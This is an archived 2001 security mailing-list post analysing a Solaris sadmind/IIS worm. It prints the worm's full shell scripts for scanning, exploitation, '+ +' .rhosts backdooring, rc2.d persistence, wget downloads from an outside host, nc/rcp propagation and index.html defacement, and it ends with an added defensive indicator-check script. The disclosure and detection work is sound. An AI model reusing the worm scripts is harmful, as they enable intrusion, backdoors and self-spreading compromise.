Hello,

Brad Doctor wrote:
> I've also seen much of the same -- I submitted this to the list over the
> weekend, but it apparently never made it there.
>
> Basically, there is a worm process much like Lion, etc. that after compromising
> the machine, starts generating IP addresses and going after more. The exploit
> that is being used is some sort of sadmin exploit. A tell-tale sign is a
> root shell open on port 600 (not functional however). The exploit places its
> contents in /dev/cuc and goes to town with a perl script and a random number
> generator. It also creates a wide-open .rhosts for root. It also starts
> an inetd process with /tmp/.x that has one service, the root shell bound to
> it, just like the lion stuff did a la "sh -i", however this shell has no IO
> capabilities on Solaris, and is thus useless. So, much like the other worms,
> this one trudges on blindly after cracking a machine that was wide-open to
> begin with. I think the same group wrote this one as well due to its
> similarities in execution and methodology. It is executing Unicode attacks,
> with static HTML in the perl script, typical anti US stuff.

In the last five days or so I have seen about 9 scans for port 111 on a
single machine. Scanning back these hosts has shown that 8 of them are
running Solaris 5.6 and have an open port 600. The root shell on the
machines I have seen was functional if you connect to them with a program
like netcat instead of telnet, since a simple "sh -i" does not set up an
appropriate environment.

The worm itself initially uses port 600 to create a "+ +" .rhosts file in
root's home directory on a newly hacked box and then copies itself via rcp
to that box as /tmp/uni.tar.

Here is the file list of the /tmp/uni.tar that I have found:

drwxr-xr-x 0/1      0 Apr 29 12:55 2001 /dev/cuc/
-rwxr-xr-x 0/1   6556 Apr 26 08:07 2001 /dev/cuc/brute
-rw-r--r-- 0/1     86 Apr 26 09:13 2001 /dev/cuc/cmd1.txt
-rw-r--r-- 0/1    655 Apr 29 12:17 2001 /dev/cuc/cmd2.txt
-rwxr-xr-x 0/1  11828 Apr 25 15:27 2001 /dev/cuc/grabbb
-rw-r--r-- 0/1    151 Apr 26 09:13 2001 /dev/cuc/ranip.pl
-rwxr-xr-x 0/1   1591 Apr 27 06:38 2001 /dev/cuc/sadmin.sh
-rwxr-xr-x 0/1  14644 Apr 25 15:27 2001 /dev/cuc/sadmindex-sparc
-rwxr-xr-x 0/1    217 Apr 26 09:59 2001 /dev/cuc/start.sh
-rwxr-xr-x 0/1    566 Apr 27 03:45 2001 /dev/cuc/time.sh
-rw-r--r-- 0/1  67798 Apr 26 09:13 2001 /dev/cuc/uniattack.pl
-rwxr-xr-x 0/1    645 Apr 26 09:13 2001 /dev/cuc/uniattack.sh
-rwxr-xr-x 0/1  28620 Apr 26 08:30 2001 /dev/cuc/nc
-rw-r--r-- 0/1    413 Apr 26 11:16 2001 /dev/cuc/index.html
-rwxr-xr-x 0/1 136248 Apr 29 09:20 2001 /dev/cuc/wget

And these are the shell scripts:

cat cmd1.txt
------------
/bin/echo "+ +" > `/bin/grep root /etc/passwd|/bin/awk -F: '{print $6}'`/.rhosts
exit

cat cmd2.txt
------------
/bin/tar -xvf /tmp/uni.tar
/bin/echo "/bin/nohup /dev/cuc/start.sh >/dev/null 2>&1 &" > /etc/rc2.d/tmp1
/bin/cat /etc/rc2.d/S71rpc >> /etc/rc2.d/tmp1
/bin/mv /etc/rc2.d/S71rpc /etc/rc2.d/tmp2
/bin/mv /etc/rc2.d/tmp1 /etc/rc2.d/S71rpc
/bin/chmod 744 /etc/rc2.d/S71rpc
/dev/cuc/wget -c -O /tmp/perl-5.005_03-sol26-sparc-local.gz http://202.96.209.10:80/mirrors/www.sunfreeware.com/sparc/2.6/perl-5.005_03-sol26-sparc-local.gz
/dev/cuc/gzip -d /tmp/perl-5.005_03-sol26-sparc-local.gz
/bin/mkdir /usr/local
/bin/cat /dev/cuc/pkgadd.txt|/usr/sbin/pkgadd -d /tmp/perl-5.005_03-sol26-sparc-local
/bin/rm -f /tmp/uni.tar /tmp/perl-5.005_03-sol26-sparc-local
exit

cat start.sh
------------
#!/bin/sh
if [ ! -d /dev/cub ]; then
  /bin/mkdir /dev/cub
fi
/bin/nohup /dev/cuc/time.sh &
i=1
while [ $i -lt 5 ]
do
  /bin/nohup /dev/cuc/sadmin.sh &
  /bin/nohup /dev/cuc/uniattack.sh &
  i=`/bin/echo "$i+1"|/bin/bc`
done

cat time.sh
-----------
#!/bin/sh
/bin/ps -ef|/bin/grep uniattack.pl > /dev/cub/tmp1
while true
do
  /bin/sleep 300
  /bin/ps -ef|/bin/grep uniattack.pl > /dev/cub/tmp2
  /bin/awk '{print $2}' /dev/cub/tmp1 > /dev/cub/tmp3
  process=`/bin/awk '{print $2}' /dev/cub/tmp2`
  for p in $process;do
    /bin/grep $p /dev/cub/tmp3
    if [ $? = 0 ];then
      /bin/kill -9 $p
    fi
  done
  /bin/cp /dev/cub/tmp2 /dev/cub/tmp1
  i=`/bin/grep hacked /dev/cub/result.txt|/bin/wc -l`
  if [ $i -gt 2000 ];then
    /bin/nohup /bin/find / -name "index.html" -exec /bin/cp /dev/cuc/index.html {} \; &
    /bin/rm -f /dev/cub/result.txt
  fi
done

cat sadmin.sh
-------------
#!/bin/sh
while true
do
  i=`/usr/local/bin/perl /dev/cuc/ranip.pl`
  j=0
  while [ $j -lt 256 ];do
    /dev/cuc/grabbb -t 3 -a $i.$j.1 -b $i.$j.50 111 >> /dev/cub/$i.txt
    /dev/cuc/grabbb -t 3 -a $i.$j.51 -b $i.$j.100 111 >> /dev/cub/$i.txt
    /dev/cuc/grabbb -t 3 -a $i.$j.101 -b $i.$j.150 111 >> /dev/cub/$i.txt
    /dev/cuc/grabbb -t 3 -a $i.$j.151 -b $i.$j.200 111 >> /dev/cub/$i.txt
    /dev/cuc/grabbb -t 3 -a $i.$j.201 -b $i.$j.254 111 >> /dev/cub/$i.txt
    j=`/bin/echo "$j+1"|/bin/bc`
  done
  iplist=`/bin/awk -F: '{print $1}' /dev/cub/$i.txt`
  for ip in $iplist;do
    /bin/rpcinfo -p $ip > /dev/cub/$i.rpc.txt
    /bin/grep 100232 /dev/cub/$i.rpc.txt >/dev/null 2>&1
    if [ $? = 0 ];then
      /dev/cuc/brute 3 $ip >/dev/null 2>&1
      if [ $? = 0 ];then
        /bin/cat /dev/cuc/cmd1.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
        /bin/tar -cvf /tmp/uni.tar /dev/cuc
        /bin/rcp /tmp/uni.tar root@$ip:/tmp/uni.tar >/dev/null 2>&1
        if [ $? = 0 ];then
          /bin/cat /dev/cuc/cmd2.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
          /bin/rsh -l root $ip /etc/rc2.d/S71rpc >/dev/null 2>&1 &
          /bin/echo $ip >> /dev/cub/sadminhack.txt
          /bin/rm -f /tmp/uni.tar
        fi
      else
        /dev/cuc/brute 4 $ip >/dev/null 2>&1
        if [ $? = 0 ];then
          /bin/cat /dev/cuc/cmd1.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
          /bin/tar -cvf /tmp/uni.tar /dev/cuc
          /bin/rcp /tmp/uni.tar root@$ip:/tmp/uni.tar >/dev/null 2>&1
          if [ $? = 0 ];then
            /bin/cat /dev/cuc/cmd2.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1
            /bin/rsh -l root $ip /etc/rc2.d/S71rpc >/dev/null 2>&1 &
            /bin/echo $ip >> /dev/cub/sadminhack.txt
            /bin/rm -f /tmp/uni.tar
          fi
        fi
      fi
    fi
    /bin/rm -f /dev/cub/$i.rpc.txt
  done
  /bin/rm -f /dev/cub/$i.txt
done

cat uniattack.sh
----------------
#!/bin/sh
while true
do
  i=`/usr/local/bin/perl /dev/cuc/ranip.pl`
  j=0
  while [ $j -lt 256 ];do
    /dev/cuc/grabbb -t 3 -a $i.$j.1 -b $i.$j.50 80 >> /dev/cub/$i.txt
    /dev/cuc/grabbb -t 3 -a $i.$j.51 -b $i.$j.100 80 >> /dev/cub/$i.txt
    /dev/cuc/grabbb -t 3 -a $i.$j.101 -b $i.$j.150 80 >> /dev/cub/$i.txt
    /dev/cuc/grabbb -t 3 -a $i.$j.151 -b $i.$j.200 80 >> /dev/cub/$i.txt
    /dev/cuc/grabbb -t 3 -a $i.$j.201 -b $i.$j.254 80 >> /dev/cub/$i.txt
    j=`/bin/echo "$j+1"|/bin/bc`
  done
  iplist=`/bin/awk -F: '{print $1}' /dev/cub/$i.txt`
  for ip in $iplist;do
    /usr/local/bin/perl /dev/cuc/uniattack.pl $ip:80 >> /dev/cub/result.txt
  done
  rm -f /dev/cub/$i.txt
done

regards,
Martin

--
Martin Markgraf                Rien Informationssysteme AG
fon: +49 2841 9083061          Eurotec-Ring 15
fax: +49 2841 9083069          D-47445 Moers
http://www.rien-ag.de          mm@rien-ag.de
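Added host check (not part of Martin's post or the worm's files): a POSIX sh script that looks for the on-host indicators the thread describes (the /dev/cuc and /dev/cub directories, /tmp/uni.tar and /tmp/.x, the "+ +" .rhosts for root, the modified /etc/rc2.d/S71rpc, and a listener on TCP 600). The function names, the --scan flag and the prefix argument are my own; the prefix exists so the checks can be exercised against a constructed directory tree.

```shell
#!/bin/sh
# Added host check for the sadmind/IIS worm indicators described in this thread
# (not from the original post). Assumes a POSIX sh such as /usr/xpg4/bin/sh on
# Solaris; the prefix argument lets the checks run against a constructed tree.

# Print each file-system indicator found under prefix $1 to stderr and the
# number of hits to stdout.
check_worm_files() {
    prefix="$1"; hits=0
    # /dev/cuc holds the tools, /dev/cub the scan results (see start.sh above)
    for d in /dev/cuc /dev/cub; do
        [ -d "$prefix$d" ] && { echo "FOUND: directory $d" >&2; hits=$((hits+1)); }
    done
    # uni.tar is rcp'd into /tmp, /tmp/.x is the inetd config for the port-600
    # shell, /etc/rc2.d/tmp2 is the copy of the real S71rpc that cmd2.txt leaves
    for f in /tmp/uni.tar /tmp/.x /etc/rc2.d/tmp2; do
        [ -e "$prefix$f" ] && { echo "FOUND: file $f" >&2; hits=$((hits+1)); }
    done
    # cmd1.txt writes a wide-open "+ +" .rhosts into root's home directory
    home=$(awk -F: '$1=="root"{print $6}' "$prefix/etc/passwd" 2>/dev/null || true)
    if [ -n "$home" ] && grep -q '^+ +' "$prefix$home/.rhosts" 2>/dev/null; then
        echo "FOUND: $home/.rhosts contains '+ +'" >&2; hits=$((hits+1))
    fi
    # cmd2.txt prepends a nohup of /dev/cuc/start.sh to /etc/rc2.d/S71rpc
    if grep -q '/dev/cuc/start.sh' "$prefix/etc/rc2.d/S71rpc" 2>/dev/null; then
        echo "FOUND: /etc/rc2.d/S71rpc starts /dev/cuc/start.sh" >&2; hits=$((hits+1))
    fi
    echo "$hits"
}

# Read "netstat -an" output on stdin; print 1 if anything listens on TCP 600
# (Solaris prints "*.600", Linux ":600"), else 0.
port600_listening() {
    if grep -E '[.:]600[[:space:]].*LISTEN' >/dev/null; then echo 1; else echo 0; fi
}

# Live scan of this host as root:  sh check.sh --scan
if [ "${1:-}" = "--scan" ]; then
    n=$(check_worm_files "")
    l=$(netstat -an 2>/dev/null | port600_listening)
    echo "file indicators: $n, port 600 listener: $l"
    # time.sh/start.sh keep uniattack.sh and uniattack.pl running; count them
    u=$(ps -ef | grep -c '[u]niattack' || true)
    echo "uniattack processes: $u"
fi
```

Any hit is a strong sign of compromise; a clean result only covers the file names and port from this thread, so it is a triage aid rather than proof of a clean host.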
This archive was generated by hypermail 2b30 : Thu May 10 2001 - 23:26:53 PDT